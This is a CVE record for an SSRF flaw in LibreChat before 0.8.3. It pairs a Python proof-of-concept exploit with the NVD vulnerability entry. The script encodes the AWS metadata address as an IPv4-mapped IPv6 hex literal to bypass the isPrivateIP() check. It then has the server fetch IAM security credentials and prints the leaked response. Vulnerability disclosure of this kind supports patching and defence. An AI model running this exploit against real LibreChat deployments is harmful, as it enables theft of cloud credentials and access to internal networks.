CVE-2026-31943

# PoC for CVE-2026-31943 (LibreChat SSRF) # This script demonstrates how to bypass the IP check using IPv6 hex format. import requests def ipv4_to_ipv6_hex(ipv4): """Convert IPv4 to IPv4-mapped IPv6 hex representation.""" parts = list(map(int, ipv4.split('.'))) hex_ip = '{:02x}{:02x}:{:02x}{:02x}'.format(parts[0], parts[1], parts[2], parts[3]) return f'::ffff:{hex_ip}' def main(): target_base_url = "http://librechat-server-url/api/endpoint" # Target internal IP (e.g., AWS Metadata Service) internal_target = "169.254.169.254" # Bypass payload using IPv6 hex format bypass_payload = ipv4_to_ipv6_hex(internal_target) malicious_url = f"http://[{bypass_payload}]/latest/meta-data/iam/security-credentials/" print(f"Testing SSRF with payload: {malicious_url}") # Example request structure (adjust based on actual API) data = { "url": malicious_url } try: response = requests.post(target_base_url, json=data) if response.status_code == 200: print("[+] Request successful! Internal data may be leaked.") print(response.text[:200]) # Print partial response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-31943", "sourceIdentifier": "[email protected]", "published": "2026-03-27T20:16:29.897", "lastModified": "2026-03-31T20:16:27.063", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.3, `isPrivateIP()` in `packages/api/src/auth/domain.ts` fails to detect IPv4-mapped IPv6 addresses in their hex-normalized form, allowing any authenticated user to bypass SSRF protection and make the server issue HTTP requests to internal network resources — including cloud metadata services (e.g., AWS `169.254.169.254`), loopback, and RFC1918 ranges. Version 0.8.3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.3", "matchCriteriaId": "2D34833A-E49E-47F0-8C2E-0D55B6CF59BB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "482D0FE3-2AB3-47B6-982E-564A5B824464"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "451E27B8-D779-4C62-AF93-C8EF026E3B09"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-w5r7-4f94-vp4c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-w5r7-4f94-vp4c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}